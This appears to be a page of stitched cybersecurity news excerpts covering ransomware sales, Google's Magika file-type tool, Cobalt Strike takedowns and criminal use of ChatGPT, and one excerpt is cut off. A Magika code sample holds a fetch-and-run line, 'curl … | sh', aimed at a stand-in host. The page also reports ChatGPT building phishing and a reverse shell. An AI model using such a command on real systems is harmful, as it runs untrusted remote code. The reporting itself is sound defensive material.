Cheap ransomware is being sold for one-time use on dark web forums, allowing inexperienced freelancers to get into cybercrime without needing to work with affiliates.
Researchers in the intelligence unit of cybersecurity firm Sophos found 19 ransomware varieties being offered for sale, or advertised as under development, on four forums between June 2023 and February 2024.
Google has confirmed a new security scheme which, it says, will help “secure, empower and advance our collective digital future” using AI. Part of this AI Cyber Defence Initiative is the open-sourcing of Magika, an AI-powered file-type identification tool that is already being used to help protect Gmail users from potentially problematic content.
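For context, Magika exposes a small Python API for identifying a file's content type from its raw bytes. The sketch below is a minimal illustration, assuming the magika package is installed from PyPI (pip install magika); the identify_bytes call and the output.ct_label / output.score fields follow the project's published examples at release, and field names may differ in later versions, so check the current documentation before relying on them.

```python
# Minimal sketch: using Google's open-source Magika library to identify the
# content type of a payload before deeper scanning. Assumes `pip install magika`;
# the identify_bytes call and output fields follow the project's published
# examples and may change in newer releases.
from magika import Magika

m = Magika()

# Hypothetical sample: raw bytes of a suspicious attachment.
sample = b"#!/bin/sh\ncurl http://example.test/payload | sh\n"
result = m.identify_bytes(sample)

print(result.output.ct_label)  # detected content type, e.g. "shell"
print(result.output.score)     # model confidence for that detection
```

Because the classification is model-based rather than signature-based, the same call works on truncated or deliberately mislabeled files, which is the kind of content Google says the tool helps flag in Gmail.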
Microsoft’s Digital Crimes Unit (DCU), cybersecurity software company Fortra™ and Health Information Sharing and Analysis Center (Health-ISAC) are taking technical and legal action to disrupt cracked, legacy copies of Cobalt Strike and abused Microsoft software, which have been used by cybercriminals to distribute malware, including ransomware. This is a change in the way DCU has...
At the end of November 2022, OpenAI released ChatGPT, the new interface for its large language model (LLM), instantly creating a flurry of interest in AI and its possible uses. However, ChatGPT has also added some spice to the modern cyber threat landscape, as it quickly became apparent that code generation can help less-skilled threat actors effortlessly launch cyberattacks.
In Check Point Research’s (CPR) previous blog, we described how ChatGPT successfully conducted a full infection flow, from creating a convincing spear-phishing email to running a reverse shell capable of accepting commands in English. The question at hand is whether this is just a hypothetical threat or whether threat actors are already using OpenAI technologies for malicious purposes.
CPR’s analysis of several major underground hacking communities shows the first instances of cybercriminals using OpenAI to develop malicious tools. As we suspected, some of these cases made clear that many of the cybercriminals using OpenAI have no development skills at all. Although the tools presented in this report are fairly basic, it is only a matter of time before more sophisticated threat actors enhance the way they use AI-based tools for malicious purposes.